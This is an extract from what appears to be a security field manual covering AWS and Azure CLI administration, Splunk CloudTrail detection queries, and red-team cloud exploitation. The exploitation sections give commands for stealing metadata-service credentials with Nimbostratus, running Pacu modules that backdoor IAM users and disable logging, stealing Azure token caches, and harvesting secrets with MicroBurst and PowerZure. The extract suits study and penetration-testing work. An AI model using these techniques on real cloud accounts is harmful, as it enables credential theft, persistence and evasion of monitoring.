aws cloudtrail add-tags --resource-id awslog --tags-list "Key=log-
type,Value=all"

List the tags of a trail

aws cloudtrail list-tags --resource-id-list

Remove a tag from a trail

aws cloudtrail remove-tags --resource-id awslog --tags-list
"Key=log-type,Value=all"

IAM USERS
**Limits = 5000 users, 100 group, 250 roles, 2 access keys per user

List all user's info

aws iam list-users

List all user's usernames

aws iam list-users --output text | cut -f 6

List current user's info

aws iam get-user

List current user's access keys

aws iam list-access-keys

Create new user

aws iam create-user --user-name aws-admin2

Create multiple new users from file

allUsers=$(cat ./[Link])
for userName in $allUsers; do
aws iam create-user --user-name $userName
done

List all users

aws iam list-users --no-paginate

Get a specific user's info

aws iam get-user --user-name aws-admin2

Delete one user

aws iam delete-user --user-name aws-admin2

Delete all users

allUsers=$(aws iam list-users --output text | cut -f 6);

21
allUsers=$(cat ./[Link])
for userName in $allUsers; do
aws iam delete-user --user-name $userName
done

IAM PASSWORD POLICY

List password policy
aws iam get-account-password-policy

Set password policy

aws iam update-account-password-policy \
--minimum-password-length 12 \
--require-symbols \
--require-numbers \
--require-uppercase-characters \
--require-lowercase-characters \
--allow-users-to-change-password

Delete password policy

aws iam delete-account-password-policy

IAM ACCESS KEYS

List all access keys
aws iam list-access-keys

List access keys of a specific user

aws iam list-access-keys --user-name aws-admin2

Create a new access key

aws iam create-access-key --user-name aws-admin2 --output text |
tee [Link]

List last access time of an access key

aws iam get-access-key-last-used --access-key-id
AKIAINA6AJZY4EXAMPLE

Deactivate an access key

aws iam update-access-key --access-key-id AKIAI44QH8DHBEXAMPLE --
status Inactive --user-name aws-admin2

Delete an access key

aws iam delete-access-key --access-key-id AKIAI44QH8DHBEXAMPLE --
user-name aws-admin2

IAM GROUPS, POLICIES, MANAGED POLICIES

22
List all groups
aws iam list-groups

Create a group
aws iam create-group --group-name FullAdmins

Delete a group
aws iam delete-group --group-name FullAdmins

List all policies

aws iam list-policies

Get a specific policy

aws iam get-policy --policy-arn <value>

List all users, groups, and roles, for a given policy

aws iam list-entities-for-policy --policy-arn <value>

List policies, for a given group

aws iam list-attached-group-policies --group-name FullAdmins

Add a policy to a group

aws iam attach-group-policy --group-name FullAdmins --policy-arn
arn:aws:iam::aws:policy/AdministratorAccess

Add a user to a group

aws iam add-user-to-group --group-name FullAdmins --user-name aws-
admin2

List users, for a given group

aws iam get-group --group-name FullAdmins

List groups, for a given user

aws iam list-groups-for-user --user-name aws-admin2

Remove a user from a group

aws iam remove-user-from-group --group-name FullAdmins --user-name
aws-admin2

Remove a policy from a group

aws iam detach-group-policy --group-name FullAdmins --policy-arn
arn:aws:iam::aws:policy/AdministratorAccess

Delete a group
aws iam delete-group --group-name FullAdmins

23
 S3 BUCKETS
List existing S3 buckets
aws s3 ls

Create a public facing bucket

aws s3api create-bucket --acl "public-read-write" --bucket
bucket_name

Verify bucket was created

aws s3 ls | grep bucket_name

Check for public facing s3 buckets

aws s3api list-buckets --query 'Buckets[*].[Name]' --output text |
xargs -I {} bash -c 'if [[ $(aws s3api get-bucket-acl --bucket {} -
-query
'"'"'Grants[?[Link]==`[Link]
llUsers` && Permission==`READ`]'"'"' --output text) ]]; then echo
{} ; fi'

Check for public facing s3 buckets & update them to be private

aws s3api list-buckets --query 'Buckets[*].[Name]' --output text |
xargs -I {} bash -c 'if [[ $(aws s3api get-bucket-acl --bucket {} -
-query
'"'"'Grants[?[Link]==`[Link]
llUsers` && Permission==`READ`]'"'"' --output text) ]]; then aws
s3api put-bucket-acl --acl "private" --bucket {} ; fi'

EC2 KEYPAIRS
List all keypairs
aws ec2 describe-key-pairs

Create a keypair
aws ec2 create-key-pair --key-name <value> --output text

Create a new local private / public keypair, using RSA 4096-bit

ssh-keygen -t rsa -b 4096

Import an existing keypair

aws ec2 import-key-pair --key-name keyname_test --public-key-
material [Link]

Delete a keypair
aws ec2 delete-key-pair --key-name <value>

24
 SECURITY GROUPS
List all security groups
aws ec2 describe-security-groups

Create a security group

aws ec2 create-security-group --vpc-id vpc-1a2b3c4d --group-name
web-access --description "web access"

List details about a security group

aws ec2 describe-security-groups --group-id sg-0000000

Open port 80, for all users

aws ec2 authorize-security-group-ingress --group-id sg-0000000 --
protocol tcp --port 80 --cidr [Link]/24

Open port 22, just for "my IP"

aws ec2 authorize-security-group-ingress --group-id sg-0000000 --
protocol tcp --port 80 --cidr <my_ip>/32

Remove a firewall rule from a group

aws ec2 revoke-security-group-ingress --group-id sg-0000000 --
protocol tcp --port 80 --cidr [Link]/24

Delete a security group

aws ec2 delete-security-group --group-id sg-00000000

IMAGES
List all private AMI's, ImageId and Name tags
aws ec2 describe-images --filter "Name=is-public,Values=false" --
query 'Images[].[ImageId, Name]' --output text | sort -k2

Delete an AMI, by ImageId

aws ec2 deregister-image --image-id ami-00000000

INSTANCES
List all instances (running, and not running)
aws ec2 describe-instances

List all instances running

aws ec2 describe-instances --filters Name=instance-state-
name,Values=running

Create a new instance

25
aws ec2 run-instances --image-id ami-f0e7d19a --instance-type
[Link] --security-group-ids sg-00000000 --dry-run

Stop an instance
aws ec2 terminate-instances --instance-ids <instance_id>

List status of all instances

aws ec2 describe-instance-status

List status of a specific instance

aws ec2 describe-instance-status --instance-ids <instance_id>

List all running instance, Name tag and Public IP Address

aws ec2 describe-instances --filters Name=instance-state-
name,Values=running --query
'Reservations[].Instances[].[PublicIpAddress,
Tags[?Key==`Name`].Value | [0] ]' --output text | sort -k2

INSTANCES TAGS
List the tags of an instance
aws ec2 describe-tags

Add a tag to an instance

aws ec2 create-tags --resources "ami-1a2b3c4d" --tags
Key=name,Value=debian

Delete a tag on an instance

aws ec2 delete-tags --resources "ami-1a2b3c4d" --tags
Key=Name,Value=

CLOUDWATCH LOG GROUPS

Create a group
aws logs create-log-group --log-group-name "DefaultGroup"

List all log groups

aws logs describe-log-groups

aws logs describe-log-groups --log-group-name-prefix "Default"

Delete a group
aws logs delete-log-group --log-group-name "DefaultGroup"

CLOUDWATCH LOG STREAMS

26
Create a log stream
aws logs create-log-stream --log-group-name "DefaultGroup" --log-
stream-name "syslog"

List details on a log stream

aws logs describe-log-streams --log-group-name "syslog"

aws logs describe-log-streams --log-stream-name-prefix "syslog"

Delete a log stream

aws logs delete-log-stream --log-group-name "DefaultGroup" --log-
stream-name "Default Stream"

LAMBDA
Get Lambda function config
aws lambda get-function-configuration --function-name
<CUSTOM_FUNCTION_NAME> --profile <PROFILE_NAME>

SNS
Get Simple Notification Service configurations
aws sns list-topics --profile <PROFILE_NAME>
aws sns get-topic-attributes --topic-arn "arn:aws:sns:us-east-
1:945109781822:<custom_suffix>" --profile <PROFILE_NAME>
aws sns list-subscriptions --profile <PROFILE_NAME>
aws sns get-subscription-attributes --subscription-arn
"arn:aws:sns:us-east-1:945109781822:<custom_part>:6d92f5d3-f299-
485d-b6fb-1aca6d9a497c" --profile <PROFILE_NAME>

RDS
Get database instances
aws rds describe-db-security-groups --db-security-group-name
<DB_SG_NAME> --profile <PROFILE_NAME>
aws rds describe-db-instances --db-instance-identifier
<DB_INSTANCE_ID> --profile <PROFILE_NAME>

REFERENCE:
[Link]
[Link]
[Link]

A A
AWS_Defend

27
 BLUE TEAM FORENSICS CLOUD

CLOUDTRAIL MONITORING
Successful Logins
Example search below returns successful authentications without
multi-factor authentication. It can help detect suspicious logins
or accounts on which MFA is not enforced.
sourcetype="aws:cloudtrail" eventName="ConsoleLogin"
"[Link]"=Success
"[Link]"=No

Failed Logins by Source

Example search returns a table of failed authentication, including
the source IP, country, city and the reason why the authentication
failed.
sourcetype="aws:cloudtrail" eventName="ConsoleLogin"
"[Link]"=Failure
| iplocation sourceIPAddress
| stats count by userName, [Link], eventSource,
sourceIPAddress, Country, City, errorMessage
| sort - count

CryptoMining GPU Instance Abuse

Example of Splunk search to identify GPU instances that have been
started.
sourcetype="aws:cloudtrail" eventSource="[Link]"
eventName="RunInstances"
| spath output=instanceType path=[Link]
| spath output=minCount
path=[Link]{}.items{}.minCount
| search instanceType IN ("p3.2xlarge", "p3.8xlarge",
"p3.16xlarge", "p3dn.24xlarge", "[Link]", "p2.8xlarge",
"p2.16xlarge", "[Link]", "g3.4xlarge", "g3.8xlarge",
"g3.16xlarge")
| stats count by eventSource, eventName, awsRegion, userName,
[Link], sourceIPAddress, [Link],
[Link],
[Link]{}.instanceId,
[Link]{}.[Link]{}.p
rivateIpAddress, minCount
| fields - count

Security Group Configurations

Example search below looks for rules allowing inbound traffic on
port 22 from any IPs. Then we look for the associated instance IDs
and append them to the list.

28
sourcetype="aws:cloudtrail" eventSource="[Link]"
eventName="AuthorizeSecurityGroupIngress"
| spath output=fromPort
path=[Link]{}.fromPort
| spath output=toPort
path=[Link]{}.toPort
| spath output=cidrIp
path=[Link]{}.[Link]{}.cidrI
p
| spath output=groupId path=[Link]
| spath output=accountId path=[Link]
| spath output=type path=[Link]
| search fromPort=22 toPort=22 AND cidrIp="[Link]/0"
| spath output=ipPermissions
path=[Link]{}
| mvexpand ipPermissions
| fields - fromPort, toPort, cidrIp
| spath input=ipPermissions
| spath output=cidrIp path=[Link]{}.cidrIp
input=ipPermissions
| join groupId
[ search index=aws eventName=RunInstances earliest=-7d
| fields
"[Link]{}.[Link]{}.groupId",
"[Link]{}.instanceId"
| rename
[Link]{}.[Link]{}.groupId as
groupId, "[Link]{}.instanceId" as
instanceId]
| stats values(instanceId) by groupId, userName, accountId, type,
sourceIPAddress, cidrIp, fromPort, toPort, ipProtocol

Network ACL Creation

Example below searches for creation of Network ACL rules allowing
inbound connections from any sources.
sourcetype="aws:cloudtrail" eventSource="[Link]"
eventName=CreateNetworkAclEntry
| spath output=cidrBlock path=[Link]
| spath output=ruleAction path=[Link]
| search cidrBlock=[Link]/0 ruleAction=Allow

Detect Public S3 Buckets

Eample search looking for the PutBucketAcl event name where the
grantee URI is AllUsers we can identify and report the open
buckets.
sourcetype=aws:cloudtrail AllUsers eventName=PutBucketAcl
errorCode=Success
| spath output=userIdentityArn path=[Link]
| spath output=bucketName path=[Link]

29
| spath output=aclControlList
path=[Link]
| spath input=aclControlList output=grantee path=Grant{}
| mvexpand grantee
| spath input=grantee
| search [Link]=*AllUsers
| rename userIdentityArn as user
| table _time, src,awsRegion Permission, [Link], bucketName,
user

VPC Traffic Mirroring

Capture & Inspect Network Traffic
aws ec2 create-traffic-mirror-filter --description "TCP Filter"

REFERENCE:
[Link]
[Link]
[Link]#create-traffic-mirroring-filter

A A
AWS_Exploit
RED TEAM EXPLOITATION CLOUD

NIMBOSTRATUS
Install
git clone git@[Link]:andresriancho/[Link]
cd nimbostratus
pip install -r [Link]

Prerequisites
Amazon AWS User account
Access Key
Boto Python 2.7 library

Insert VULN_URL into the utils/[Link] file. Run dump-metada:

nimbostratus -v dump-ec2-metadata --mangle-
function=[Link]

Enumerate meta-data service of target using mangle function &

retrieve any access key credentials found on the meta-data server:
nimbostratus -v dump-credentials --mangle-
function=[Link]

30
Dump all permissions for the provided credentials. Use right after
dump-credentials to know which permissions are available:
nimbostratus dump-permissions --access-key=**************PXXQ --
secret-key=*****************************SUW --token
*****************************************JFE

Create a new user. Assigns a random name to the created user and
attaches a policy which looks like this:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
Execute:
nimbostratus -v create-iam-user --access-key **************UFUA --
secret-key **************************************DDxSZ --token
****************************************tecaoI

Create RDS database snapshot:

nimbostratus -v snapshot-rds --access-key ********AUFUA --secret-
key *****************************yDDxSZ --token
************************************************K2g2QU= --rds-name
<DB_NAME> --password ********* --region us-west-2

PACU
Install
git clone [Link]
cd pacu
bash [Link]
python3 [Link]

Starting Pacu
python3 [Link]
>set_keys
#Key alias - Used internally within Pacu and is associated with a
AWS key pair. Has no bearing on AWS permissions.
#Access Key - Generated from an AWS User
#Secret Key - Secret key associated with access key. Omitted in
image.
#(Optional) Session Key - serves as a temporary access key to
access AWS services.
**provide a session name, after which you can add your compromised
credentials with the set_keys command and begin running modules

31
Running Modules
#list out modules
> ls
SYNTAX:> run <module_name> [--keyword-arguments]

PACU MODULES
iam__enum_assume_role
Enumerates existing roles in other AWS accounts to try and gain
access via misconfigurations.

iam__enum_users
Enumerates IAM users in a separate AWS account, given the account
ID.

s3__bucket_finder
Enumerates/bruteforces S3 buckets based on different parameters.

aws__enum_account
Enumerates data About the account itself.

aws__enum_spend
Enumerates account spend by service.

codebuild__enum
Enumerates CodeBuild builds and projects while looking for
sensitive data

ebs__enum_volumes_snapshots
Enumerates EBS volumes and snapshots and logs any without
encryption.

ec2__check_termination_protection
Collects a list of EC2 instances without termination protection.

ec2__download_userdata
Downloads User Data from EC2 instances.

ec2__enum
Enumerates a ton of relevant EC2 info.

glue__enum
Enumerates Glue connections, crawlers, databases, development
endpoints, and jobs.

iam__enum_permissions
Tries to get a confirmed list of permissions for the current (or
all) user(s).

iam__enum_users_roles_policies_groups

32
Enumerates users, roles, customer-managed policies, and groups.

iam__get_credential_report
Generates and downloads an IAM credential report.

inspector__get_reports
Captures vulnerabilties found when running a preconfigured
inspector report.

lambda__enum
Enumerates data from AWS Lambda.

lightsail__enum
Captures common data associated with Lightsail

iam__privesc_scan
An IAM privilege escalation path finder and abuser.
**WARNING: Due to the implementation in IAM policies, this module
has a difficult time parsing "NotActions". LATERAL_MOVE

cloudtrail__csv_injection
Inject malicious formulas/data into CloudTrail event history.

vpc__enum_lateral_movement
Looks for Network Plane lateral movement opportunities.

api_gateway__create_api_keys
Attempts to create an API Gateway key for any/all REST APIs that
are defined.

ebs__explore_snapshots
Restores and attaches EBS volumes/snapshots to an EC2 instance of
your choice.

ec2__startup_shell_script
Stops and restarts EC2 instances to execute code.

lightsail__download_ssh_keys
Downloads Lightsails default SSH key pairs.

lightsail__generate_ssh_keys
Creates SSH keys for available regions in AWS Lightsail.

lightsail__generate_temp_access
Creates temporary SSH keys for available instances in AWS
Lightsail.

systemsmanager__rce_ec2
Tries to execute code as root/SYSTEM on EC2 instances.
**NOTE: Linux targets will run the command using their default
shell (bash/etc.) and Windows hosts will run the command using

33
PowerShell, so be weary of that when trying to run the same command
against both operating [Link] Systems Manager Run
**Command can delay the results of a call by a random amount.
Experienced 15 minute delays before command was executed on the
target.

ec2__backdoor_ec2_sec_groups
Adds backdoor rules to EC2 security groups.

iam__backdoor_assume_role
Creates assume-role trust relationships between users and roles.

iam__backdoor_users_keys
Adds API keys to other users.

iam__backdoor_users_password
Adds a password to users without one.

s3__download_bucket
Enumerate and dumps files from S3 buckets.

cloudtrail__download_event_history
Downloads CloudTrail event history to JSON files
to ./sessions/[current_session_name]/downloads/cloudtrail_[region]_
event_history_[timestamp].json.
**NOTE: This module can take a very long time to complete. A rough
estimate is about 10000 events retrieved per five minutes.

cloudwatch__download_logs
Captures CloudWatch logs and downloads them to the session
downloads folder

detection__disruption
Disables, deletes, or minimizes various logging/monitoring
services.

detection__enum_services
Detects monitoring and logging capabilities.

elb__enum_logging
Collects a list of Elastic Load Balancers without access logging
and write a list of ELBs with logging disabled
to ./sessions/[current_session_name]/downloads/elbs_no_logs_[timest
amp].csv.

guardduty__whitelist_ip
Adds an IP address to the list of trusted IPs in GuardDuty.
**NOTE: This will not erase any existing GuardDuty findings, it
will only prevent future findings related to the included IP
addresses.

34
**WARNING: Only one list of trusted IP addresses is allowed per
GuardDuty detector. This module will prompt you to delete an
existing list if you would like, but doing so could have unintended
bad consequences on the target AWS environment.

waf__enum
Detects rules and rule groups for WAF.

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

A A
AWS_Hardening
BLUE TEAM CONFIGURATION CLOUD

AWS Best Practices Rules

[Link]

A A
AWS_Terms
ALL GENERAL CLOUD

AWS IoT: AWS IoT is a managed cloud service that lets connected
devices easily and securely interact with cloud applications and
other devices.
Certificate Manager: AWS Certificate Manager easily provision,
manage, and deploy Secure Sockets Layer/Transport Layer Security
(SSL/TLS) certificates for use with AWS services.
CloudFormation: AWS CloudFormation lets you create and update a
collection of related AWS resources in a predictable fashion.
CloudFront: Amazon CloudFront provides a way to distribute
content to end-users with low latency and high data transfer
speeds.
CloudSearch: AWS CloudSearch is a fully managed search service
for websites and apps.
CloudTrail: AWS CloudTrail provides increased visibility into
user activity by recording API calls made on your account.

35
Data Pipeline: AWS Data Pipeline is a lightweight orchestration
service for periodic, data-driven workflows.
DMS: AWS Database Migration Service (DMS) helps you migrate
databases to the cloud easily and securely while minimizing
downtime.
DynamoDB: Amazon DynamoDB is a scalable NoSQL data store that
manages distributed replicas of your data for high availability.
EC2: Amazon Elastic Compute Cloud (EC2) provides resizable
compute capacity in the cloud.
EC2 Container Service: Amazon ECS allows you to easily run and
manage Docker containers across a cluster of Amazon EC2
instances.
Elastic Beanstalk: AWS Elastic Beanstalk is an application
container for deploying and managing applications.
ElastiCache: Amazon ElastiCache improves application performance
by allowing you to retrieve information from an in-memory
caching system.
Elastic File System: Amazon Elastic File System (Amazon EFS) is
a file storage service for Amazon Elastic Compute Cloud (Amazon
EC2) instances.
Elasticsearch Service: Amazon Elasticsearch Service is a managed
service that makes it easy to deploy, operate, and scale Elasti-
csearch, a popular open-source search and analytics engine.
Elastic Transcoder: Amazon Elastic Transcoder lets you convert
your media files in the cloud easily, at low cost, and at scale
EMR: Amazon Elastic MapReduce lets you perform big data tasks
such as web indexing, data mining, and log file analysis.
Glacier: Amazon Glacier is a low-cost storage service that
provides secure and durable storage for data archiving and
backup.
IAM: AWS Identity and Access Management (IAM) lets you securely
control access to AWS services and resources.
Inspector: Amazon Inspector enables you to analyze the behavior
of the applications you run in AWS and helps you to identify
potential security issues.
Kinesis: Amazon Kinesis services make it easy to work with real-
time streaming data in the AWS cloud.
Lambda: AWS Lambda is a compute service that runs your code in
response to events and automatically manages the compute
resources for you.
Machine Learning: Amazon Machine Learning is a service that
enables you to easily build smart applications.
OpsWorks: AWS OpsWorks is a DevOps platform for managing applic-
ations of any scale or complexity on the AWS cloud.
RDS: Amazon Relational Database Service (RDS) makes it easy to
set up, operate, and scale familiar relational databases in the
cloud.
Redshift: Amazon Redshift is a fast, fully managed, petabyte--
scale data warehouse that makes it cost-effective to analyze all
your data using your existing business intelligence tools.

36
 Route 53: Amazon Route 53 is a scalable and highly available
Domain Name System (DNS) and Domain Name Registration service.
SES: Amazon Simple Email Service (SES) enables you to send and
receive email.
SNS: Amazon Simple Notification Service (SNS) lets you publish
messages to subscribers or other applications.
Storage Gateway: AWS Storage Gateway securely integrates on-pre-
mises IT environments with cloud storage for backup and disaster
recovery.
SQS: Amazon Simple Queue Service (SQS) offers a reliable, highly
scalable, hosted queue for storing messages.
SWF: Amazon Simple Workflow (SWF) coordinates all of the
processing steps within an application.
S3: Amazon Simple Storage Service (S3) can be used to store and
retrieve any amount of data.
VPC: Amazon Virtual Private Cloud (VPC) lets you launch AWS
resources in a private, isolated cloud.

REFERENCE:
[Link]

A A
AWS_Tricks
ALL MISC CLOUD

SUBNETS
Creating A Subnet
aws ec2 create-subnet --vpc-id <vpc_id> --cidr-block <cidr_block> -
-availability-zone <availability_zone> --region <region>

Auto Assigning Public IPs To Instances In A Public Subnet

aws ec2 modify-subnet-attribute --subnet-id <subnet_id> --map-
public-ip-on-launch --region <region>

VPC
Creating A VPC
aws ec2 create-vpc --cidr-block <cidr_block> --regiosn <region>

Allowing DNS hostnames

aws ec2 modify-vpc-attribute --vpc-id <vpc_id> --enable-dns-
hostnames "{\"Value\":true}" --region <region>

NAT

37
Setting Up A NAT Gateway
#Allocate Elastic IP
aws ec2 allocate-address --domain vpc --region <region>

#AllocationId to create the NAT Gateway for the public zone

aws ec2 create-nat-gateway --subnet-id <subnet_id> --allocation-id
<allocation_id> --region <region>

S3 API
Listing Only Bucket Names
aws s3api list-buckets --query 'Buckets[].Name'

Getting a Bucket Region

aws s3api get-bucket-location --bucket <bucket_name>

Syncing a Local Folder with a Bucket

aws s3 sync <local_path> s3://<bucket_name>

Copying Folders
aws s3 cp <folder_name>/ s3://<bucket_name>/ --recursive

To exclude files from copying

aws s3 cp <folder_name>/ s3://<bucket_name>/ --recursive --exclude
"<file_name_or_a_wildcard_extension>"

To exclude a folder from copying

aws s3 cp [Link]/ s3://example-backup/ --recursive --exclude
".git/*"

Removing a File from a Bucket

aws s3 rm s3://<bucket_name>/<file_name>

Deleting a Bucket
aws s3 rb s3://<bucket_name> --force

Emptying a Bucket
aws s3 rm s3://<bucket_name>/<key_name> --recursive

EC2 Instance
Creating AMI Without Rebooting the Machine
aws ec2 create-image --instance-id <instance_id> --name "image-
$(date +'%Y-%m-%d_%H-%M-%S')" --description "image-$(date
+'%Y-%m-%d_%H-%M-%S')" --no-reboot

38
 LAMBDA
Using AWS Lambda with Scheduled Events
sid=Sid$(date +%Y%m%d%H%M%S); aws lambda add-permission --
statement-id $sid --action 'lambda:InvokeFunction' --principal
[Link] --source-arn
arn:aws:events:<region>:<arn>:rule/AWSLambdaBasicExecutionRole --
function-name function:<awsents> --region <region>

Deleting Unused Volumes

for x in $(aws ec2 describe-volumes --filters
Name=status,Values=available --profile <your_profile_name>|grep
VolumeId|awk '{print $2}' | tr ',|"' ' '); do aws ec2 delete-volume
--region <region> --volume-id $x; done

With "profile":
for x in $(aws ec2 describe-volumes --filters
Name=status,Values=available --profile <your_profile_name>|grep
VolumeId|awk '{print $2}' | tr ',|"' ' '); do aws ec2 delete-volume
--region <region> --volume-id $x --profile <your_profile_name>;
done

REFERENCE:
[Link]

A A
AZURE CLI
RED/BLUE TEAM RECON/ADMIN CLOUD
Azure command-line interface (Azure CLI) is an environment to
create and manage Azure resources.

Login in CLI
az login -u myemail@[Link]

List accounts
az account list

Set subscription
az account set --subscription "xxx"

List all locations

az account list-locations

List all resource groups

az resource list

39
Get version of the CLI
azure --version

Get help
azure help

Get all available VM sizes

az vm list-sizes --location <region>

Get all available VM images for Windows and Linux

az vm image list --output table

Create a Ubuntu Linux VM

az vm create --resource-group myResourceGroup --name myVM --image
ubunlts

Create a Windows Datacenter VM

az vm create --resource-group myResourceGroup --name myVM --image
win2016datacenter

Create a Resource group

az group create --name myresourcegroup --location eastus

Create a Storage account

az storage account create -g myresourcegroup -n mystorageaccount -l
eastus --sku Standard_LRS

Permanently delete a resource group

az group delete --name <myResourceGroup>

List VMs
az vm list

Start a VM
az vm start --resource-group myResourceGroup --name myVM

Stop a VM
az vm stop --resource-group myResourceGroup --name myVM

Deallocate a VM
az vm deallocate --resource-group myResourceGroup --name myVM

Restart a VM
az vm restart --resource-group myResourceGroup --name myVM

40
Redeploy a VM
az vm redeploy --resource-group myResourceGroup --name myVM

Delete a VM
az vm delete --resource-group myResourceGroup --name myVM

Create image of a VM
az image create --resource-group myResourceGroup --source myVM --
name myImage

Create VM from image

az vm create --resource-group myResourceGroup --name myNewVM --
image myImage

List VM extensions
az vm extension list --resource-group azure-playground-resources --
vm-name azure-playground-vm

Delete VM extensions
az vm extension delete --resource-group azure-playground-resources
--vm-name azure-playground-vm --name bootstrapper

Create a Batch account

az batch account create -g myresourcegroup -n mybatchaccount -l
eastus

Create a Storage account

az storage account create -g myresourcegroup -n mystorageaccount -l
eastus --sku Standard_LRS

Associate Batch with storage account.

az batch account set -g myresourcegroup -n mybatchaccount --
storage-account mystorageaccount

Authenticate directly against the batch account

az batch account login -g myresourcegroup -n mybatchaccount

Display the details of our created batch account

az batch account show -g myresourcegroup -n mybatchaccount

Create a new application

az batch application create --resource-group myresourcegroup --name
mybatchaccount --application-id myapp --display-name "My
Application"

Add zip files to application

41
az batch application package create --resource-group
myresourcegroup --name mybatchaccount --application-id myapp --
package-file [Link] --version 1.0

Assign the application package as the default version

az batch application set --resource-group myresourcegroup --name
mybatchaccount --application-id myapp --default-version 1.0

Retrieve a list of available images and node agent SKUs.

az batch pool node-agent-skus list

Create new Linux pool with VM config

az batch pool create --id mypool-linux --vm-size Standard_A1 --
image canonical:ubuntuserver:16.04.0-LTS --node-agent-sku-id
“[Link] 16.04”

Resize the pool to start up VMs

az batch pool resize --pool-id mypool-linux --target-dedicated 5

Check the status of the pool

az batch pool show --pool-id mypool-linux

List the compute nodes running in a pool

az batch node list --pool-id mypool-linux

If a particular node in the pool is having issues, it can be

rebooted or reimaged. A typical node ID will be in the format 'tvm-
xxxxxxxxxx_1-'
az batch node reboot --pool-id mypool-linux --node-id tvm-123_1-
20170316t000000z

Re-allocate work to another node

az batch node delete --pool-id mypool-linux --node-list tvm-123_1-
20170316t000000z tvm-123_2-20170316t000000z --node-deallocation-
option requeue

Create a new job to encapsulate the tasks that we want to add

az batch job create --id myjob --pool-id mypool

Add tasks to the job

az batch task create --job-id myjob --task-id task1 --application-
package-references myapp#1.0 --command-line "/bin/<shell> -c
/path/to/[Link]"

Add multiple tasks at once

az batch task create --job-id myjob --json-file [Link]

42
Update job automatically marked as completed once all the tasks are
finished
az batch job set --job-id myjob --on-all-tasks-complete
terminateJob

Monitor the status of the job

az batch job show --job-id myjob

Monitor the status of a task.

az batch task show --job-id myjob --task-id task1

Delete a job
az batch job delete --job-id myjob

Managing Containers
#If you HAVE AN SSH run this to create an Azure Container Service
Cluster (~10 mins)
az acs create -n acs-cluster -g acsrg1 -d applink789

#If you DO NOT HAVE AN SSH run this to create an Azure Container
Service Cluster (~10 mins)
az acs create -n acs-cluster -g acsrg1 -d applink789 --generate-
ssh-keys

List clusters under your subscription

az acs list --output table

List clusters in a resource group

az acs list -g acsrg1 --output table

Display details of a container service cluster

az acs show -g acsrg1 -n acs-cluster --output list

Scale using ACS

az acs scale -g acsrg1 -n acs-cluster --new-agent-count 4

Delete a cluster
az acs delete -g acsrg1 -n acs-cluster

REFERENCE:
[Link]
[Link]

A A

43
 AZURE_Defend
BLUE TEAM THREAT HUNTING CLOUD

Azure Sentinel Hunt Query Resource

[Link]
Microsoft Azure Sentinel is a scalable, cloud-native, security
information event management (SIEM) and security orchestration
automated response (SOAR) solution.

Uncoder: One common language for cyber security

[Link]
[Link] is the online translator for SIEM saved searches,
filters, queries, API requests, correlation and Sigma rules to help
SOC Analysts, Threat Hunters and SIEM Engineers. Easy, fast and
private UI you can translate the queries from one tool to another
without a need to access to SIEM environment and in a matter of
just few seconds.
[Link] supports rules based on Sigma, ArcSight, Azure Sentinel,
Elasticsearch, Graylog, Kibana, LogPoint, QRadar, Qualys, RSA
NetWitness, Regex Grep, Splunk, Sumo Logic, Windows Defender ATP,
Windows PowerShell, X-Pack Watcher.

REFERENCE:
[Link]
[Link]
[Link]
[Link]

A A
AZURE_Exploit
RED TEAM EXPLOITATION CLOUD

AZURE USER LOCAL ARTIFACTS

Azure File/Folder Created Locally
#[Link] is cleartext file containing the AccessKey; inject
into user's process to view contents of file
C:\Users\<USERNAME>\.Azure\[Link]

PowerShell Azure Modules Installed

#Indications the target user has installed Azure modules
C:\Program Files\windowsPowerShell\Modules\Az.*
C:\Users\<USERNAME>\Documents\WindowsPowerShell\Modules\Az.*
C:\Windows\system32\windowsPowerShell\v1.0\Modules\Az.*
Search for Save-AzContent Usage & File Location
PS> Get-PSReadLineOption

44
PS> Select-String -Path <\path\to\ConsoleHost_history.txt> -
Pattern 'Save-AzContext'

Azure Token "CachedData:" Key Inside "TokenCache:" .JSON File

#Base64 Encoded Data; Decode it to recreate [Link] file

Import Decoded [Link] Into Attacker Local PowerShell

#Once imported attacker will not be prompted for user/password
PS> Import-AzContext -Path C:\path\to\decoded_TokenCache.dat

MICROBURST
SCENARIO: You’ve been able to obtain credentials for a privileged
user for Azure AD (Owner or Contributor). You can now target this
user by possibly harvesting credentials stored in either Key
Vaults, App Services Configurations, Automation Accounts, and
Storage Accounts.

STEP 1: Install PowerShell modules and download/Import Microburst

by NetSPI:
Install-Module -Name AzureRM
Install-Module -Name Azure

[Link]
Import-Module .\Get-AzurePasswords.ps1

STEP 2: Now that the PowerShell module is imported we can execute

it to retrieve all available credentials at once from Key Vaults,
App Services Configurations, Automation Accounts, and Storage
Accounts. You will be prompted for the user account, credentials,
and subscription you’d like to use. We can pipe the output to a CSV
file:
Get-AzurePasswords -Verbose | Export-CSV

POWERZURE
PowerZure is a PowerShell script written to assist in assessing
Azure security. Functions are broken out into their context as well
as the role needed to run them.

FUNCTION DESCRIPTION ROLE

HELP
PowerZure -h Displays the help menu Any
MANDATORY
Sets the default
Subscription to operate
Set-Subscription in Reader
OPERATIONAL
Creates a Runbook that
Create-Backdoor creates an Azure account Admin

45
 and generates a Webhook
to that Runbook
Executes the backdoor
that is created with
"Create-Backdoor". Needs
the URI generated from
Execute-Backdoor Create-Backdoor Admin
Executes a command on a
Execute-Command specified VM Contributor
Executes MSBuild payload
on a specified VM. By
default, Azure VMs
have .NET 4.0 installed.
Execute-MSBuild Will run as SYSTEM. Contributor
Executes a supplied
Execute-Program program. Contributor
Uploads a supplied file
Upload-StorageContent to a storage share. Contributor
Stop-VM Stops a VM Contributor
Start-VM Starts a VM Contributor
Restart-VM Restarts a VM Contributor
Start-Runbook Starts a specific Runbook Contributor
Sets a role for a
specific user on a
specific resource or
Set-Role subscription Owner
Removes a user from a
role on a specific
Remove-Role resource or subscription Owner
Set-Group Adds a user to a group Admin
INFO GATHER
Returns the current
logged in user name,
their role + groups, and
Get-CurrentUser any owned objects Reader
Lists all users in the
Get-AllUsers subscription Reader
Gathers info on a
Get-User specific user Reader
Lists all groups + info
Get-AllGroups within Azure AD Reader
Lists all resources in
Get-Resources the subscription Reader
Lists all applications in
Get-Apps the subscription Reader
Gets all the members of a
specific group. Group
Get-GroupMembers does NOT mean role. Reader

46
 Gathers all the group
members of all the
Get-AllGroupMembers groups. Reader
Gets all the members of
all roles. Roles does not
Get-AllRoleMembers mean groups. Reader
Lists the roles in the
Get-Roles subscription Reader
Gets the members of a
